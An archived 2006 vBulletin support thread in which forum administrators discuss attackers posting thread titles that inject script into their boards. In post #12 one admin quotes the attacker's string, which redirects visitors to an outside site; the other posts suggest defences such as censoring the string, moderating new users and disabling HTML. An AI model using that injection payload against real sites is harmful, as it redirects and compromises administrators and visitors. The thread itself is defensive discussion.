Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #11  
Old 09-05-2006, 04:19 PM
optrex optrex is offline
 
Join Date: Sep 2005
Posts: 344
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Have you let cyb know ???
Reply With Quote
  #12  
Old 09-05-2006, 04:20 PM
TorGa3iGhT TorGa3iGhT is offline
 
Join Date: Jun 2005
Posts: 26
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

i posted it in his thread....for this hack I mean...i dind't PM him or anything though

--------------
AHHHH!!! someone tried it AGAIN while i was sitting there blocking everything. luckily i disabled the plugin and nothing happened, but here's the line of text they used this time...i'm a lil scared to find out what that would have done, since it was executing a script file:

Code:
">"">>>><script>location="http://intikam.us/hck"</script> """" >
Reply With Quote
  #13  
Old 09-06-2006, 03:18 AM
Phaedrus Phaedrus is offline
 
Join Date: Jul 2006
Location: Colorado
Posts: 617
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

You need to delete the Thread title when deleting the post... Edit it and make it so that the redirect isn't there anymore and this will end your admin being redirected. Somewhere you have HTML on...
Reply With Quote
  #14  
Old 09-06-2006, 02:18 PM
roni1015 roni1015 is offline
 
Join Date: Dec 2005
Posts: 25
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I've had this happen as well. What I don't understand is why people even bother doing this? It's the stupidest thing. What an enormous waste of their time to search out all these boards, register and then post this stupid title. All a person has to do is delete the stupid post and it's fixed. <sarcasm>Wow, those hackers are pretty smart, I know I'm impressed. </sarcasm> *rolling eyes* Sorry, just needed to rant there for a second about these little twits making our lives more difficult.

Anyway, I found a thread on here the other day about this where someone suggested to add that string they are using to the list of censored words and so I did that since it seemed like the quickest way to deal with this. So far, that has worked like a charm. I had one this morning actually, it ended up being a few of these ">"">> and then a whole bunch of these ************. So, it didn't work for them. Hehe.
Reply With Quote
  #15  
Old 09-06-2006, 05:17 PM
optrex optrex is offline
 
Join Date: Sep 2005
Posts: 344
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Just moderate new users. They post as soon as they have activated the email, so the posts end up in a moderation queue. Then all you have to do is delete

Adding words to a censored list will only stop this variant of attack, it wont stop html being used in the first place - therefore the vulnerability is still open !!!!!!
Reply With Quote
  #16  
Old 09-06-2006, 11:21 PM
Phaedrus Phaedrus is offline
 
Join Date: Jul 2006
Location: Colorado
Posts: 617
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by optrex
Just moderate new users. They post as soon as they have activated the email, so the posts end up in a moderation queue. Then all you have to do is delete

Adding words to a censored list will only stop this variant of attack, it wont stop html being used in the first place - therefore the vulnerability is still open !!!!!!
Or at least have it censor the carats >><<
Reply With Quote
  #17  
Old 09-08-2006, 04:16 PM
Greek76's Avatar
Greek76 Greek76 is offline
 
Join Date: Aug 2006
Location: Planet Earth
Posts: 440
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

What if you add html phrases to your censors. Example maybe html, .exe, ect... That might actually work. I found the best way to stop stuff like this is set user registration to admin and pay attention to their email address if it looks fishy dont activate their account.
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 02:10 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.07862 seconds
  • Memory Usage 2,221KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (7)post_thanks_box
  • (7)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (7)post_thanks_postbit_info
  • (7)postbit
  • (7)postbit_onlinestatus
  • (7)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete